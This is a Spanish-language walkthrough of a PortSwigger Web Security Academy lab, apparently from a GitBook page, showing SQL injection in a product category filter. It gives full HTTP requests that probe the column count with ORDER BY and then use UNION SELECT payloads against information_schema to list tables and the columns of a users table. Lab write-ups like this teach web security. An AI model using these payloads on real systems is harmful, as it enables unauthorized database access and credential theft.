# Lab 5: SQL injection attack, listing the database contents on non-Oracle databases

Se inicia el laboratorio y al interactuar con los filtros de busqueda:

Se genera la siguiente peticion:

```
GET /filter?category=Corporate+gifts HTTP/2
Host: 0aeb00b004aac525817ed54000ef0015.web-security-academy.net
Cookie: session=5YjQozT4bUZR3JR3qDg9UE97lh1xaCaY
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aeb00b004aac525817ed54000ef0015.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

Y la anterior peticion responde asi:

```
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 8912

```

Empezamos a validar el numero de campos con ORDER BY:

```
GET /filter?category='+order+by+1-- HTTP/2
Host: 0aeb00b004aac525817ed54000ef0015.web-security-academy.net
Cookie: session=5YjQozT4bUZR3JR3qDg9UE97lh1xaCaY
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aeb00b004aac525817ed54000ef0015.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

Lo anterior responde asi:

```
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3920

```

Se procede a incrementar el valor a 2:

```
GET /filter?category='+order+by+2-- HTTP/2
Host: 0aeb00b004aac525817ed54000ef0015.web-security-academy.net
Cookie: session=5YjQozT4bUZR3JR3qDg9UE97lh1xaCaY
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aeb00b004aac525817ed54000ef0015.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

Y lo anterior responde asi:

```
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3920

```

Y finalizamos validando con el numero 3:

```
GET /filter?category='+order+by+3-- HTTP/2
Host: 0aeb00b004aac525817ed54000ef0015.web-security-academy.net
Cookie: session=5YjQozT4bUZR3JR3qDg9UE97lh1xaCaY
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aeb00b004aac525817ed54000ef0015.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

La inyeccion previa responde con un error:

```
HTTP/2 500 Internal Server Error
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2423

```

Por lo tanto, podemos afirmar que tenemos 2 campos disponibles para nuestras proximas inyecciones:

Luego de validar que tipo de dato son cada columna, podemos enumerar con el siguiente payload:

```
GET /filter?category='+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- HTTP/2
Host: 0aeb00b004aac525817ed54000ef0015.web-security-academy.net
Cookie: session=5YjQozT4bUZR3JR3qDg9UE97lh1xaCaY
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aeb00b004aac525817ed54000ef0015.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

La anterior consulta responde asi:

<figure><img src="https://1990863415-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FCohdns2VDWfowigRKoD0%2Fuploads%2FhwqFjddPpfGfcVkvIQCP%2Fimage.png?alt=media&#x26;token=d2e4f27f-98a8-4685-b727-0000d7ea2ef1" alt=""><figcaption></figcaption></figure>

Luego de obtener los nombres de las tablas podemos intentar retornar las columnas de una tabla especifica:

```
GET /filter?category='+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_upxvct'-- HTTP/2
Host: 0aeb00b004aac525817ed54000ef0015.web-security-academy.net
Cookie: session=5YjQozT4bUZR3JR3qDg9UE97lh1xaCaY
Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aeb00b004aac525817ed54000ef0015.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i


```

El payload anterior logra retornar los nombres de las columnas de la tabla USUARIOS:

<figure><img src="https://1990863415-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FCohdns2VDWfowigRKoD0%2Fuploads%2F6zJeWhRre9Vq6NGwvdLU%2Fimage.png?alt=media&#x26;token=11bd7586-6f01-40e2-aa1d-e74fffd6ad02" alt=""><figcaption></figcaption></figure>

Utilizando los nombres de las columnas y el nombre de la tabla, se diseña una consulta que retorne los valores que tiene esta tabla:

<figure><img src="https://1990863415-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FCohdns2VDWfowigRKoD0%2Fuploads%2Fc5xJRHbEVxUEyAOPAk7r%2Fimage.png?alt=media&#x26;token=766b8a3c-b21c-4854-8fc4-5118f66d8a26" alt=""><figcaption></figcaption></figure>